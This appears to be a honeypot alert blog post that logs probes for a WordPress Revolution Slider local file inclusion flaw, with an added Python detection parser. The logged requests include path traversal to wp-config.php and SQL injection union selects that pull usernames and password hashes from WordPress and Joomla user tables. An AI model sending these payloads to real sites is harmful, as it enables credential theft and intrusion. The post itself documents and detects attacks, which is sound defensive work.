[Honeypot Alert] Active Probes for WordPress revslider_show_image Plugin Local File Inclusion Flaw – SpiderLabs Anterior

Why, there it is! Oh, and go to the bottom for a really special logged event.

[403 GET / HEAD Request: September 3, 2014 – 7:27 pm]
REMOTE_ADDR: 62.236.108.73
Host Name: tor.effi.org
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

REMOTE_ADDR: 37.130.227.133
Host Name: torland1-this.is.a.tor.exit.server.torland.is
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

[403 GET / HEAD Request: September 3, 2014 – 10:25 pm]
REMOTE_ADDR: 37.130.227.133
Host Name: torland1-this.is.a.tor.exit.server.torland.is
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
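
As an added detection example (not code from this post or from SpiderLabs), here is a small Python parser for the honeypot's KEY: value records shown above that flags any request calling revslider_show_image with a traversing img value; the sample records, addresses and user agents in it are constructed, and one event is deliberately left without a bracketed header, as one event on this page is.

```python
from urllib.parse import parse_qs, urlsplit, unquote

# Constructed sample in the honeypot's KEY: value layout (not records from the post);
# the second event has no bracketed header, as one event on the page does.
SAMPLE_LOG = """\
[403 GET / HEAD Request: September 3, 2014 - 7:27 pm]
REMOTE_ADDR: 192.0.2.10
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

REMOTE_ADDR: 192.0.2.11
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php

[200 GET / HEAD Request: September 3, 2014 - 7:30 pm]
REMOTE_ADDR: 192.0.2.12
REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=slider1.jpg
"""

def parse_records(text):
    """Split the log into events, each a dict of KEY -> value."""
    records, current = [], None
    for line in text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            current = {"header": line[1:-1]}
            records.append(current)
        elif ":" in line:
            key, _, value = line.partition(":")
            key = key.strip()
            # a REMOTE_ADDR line with no preceding header opens a new event
            if current is None or (key == "REMOTE_ADDR" and key in current):
                current = {"header": ""}
                records.append(current)
            current[key] = value.strip()
    return records

def is_revslider_lfi_probe(uri):
    """True when action=revslider_show_image is given a traversing img value."""
    params = parse_qs(urlsplit(uri).query)  # parse_qs decodes one %-layer itself
    if "revslider_show_image" not in params.get("action", []):
        return False
    for img in params.get("img", []):
        img = unquote(img).replace("\\", "/")  # second pass: double-encoded ../
        if ".." in img.split("/") or img.startswith("/"):
            return True
    return False

def find_probes(text):
    """(REMOTE_ADDR, REQUEST_URI) for every event that matches the probe."""
    return [(r.get("REMOTE_ADDR", "?"), r["REQUEST_URI"]) for r in parse_records(text)
            if is_revslider_lfi_probe(r.get("REQUEST_URI", ""))]
```

A legitimate slider image name never needs a ".." segment or an absolute path, so this rule fires on the probe without matching normal plugin traffic.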


Just for FUN!!

First they tried:

[403 GET / HEAD Request: September 2, 2014 – 8:15 am]
REMOTE_ADDR: 85.25.213.172
Host Name: static-ip-85-25-213-172.inaddr.ip-pool.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users–
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Then they tried a little later:

[403 GET / HEAD Request: September 2, 2014 – 2:27 pm]
REMOTE_ADDR: 85.25.213.172
Host Name: static-ip-85-25-213-172.inaddr.ip-pool.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /?option=com_tag&controller=tag&task=add&article_id=-260479///!union////!select///concatusername,0x3a,password,0x3a,usertype///!from///jos_users//&tmpl=component
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
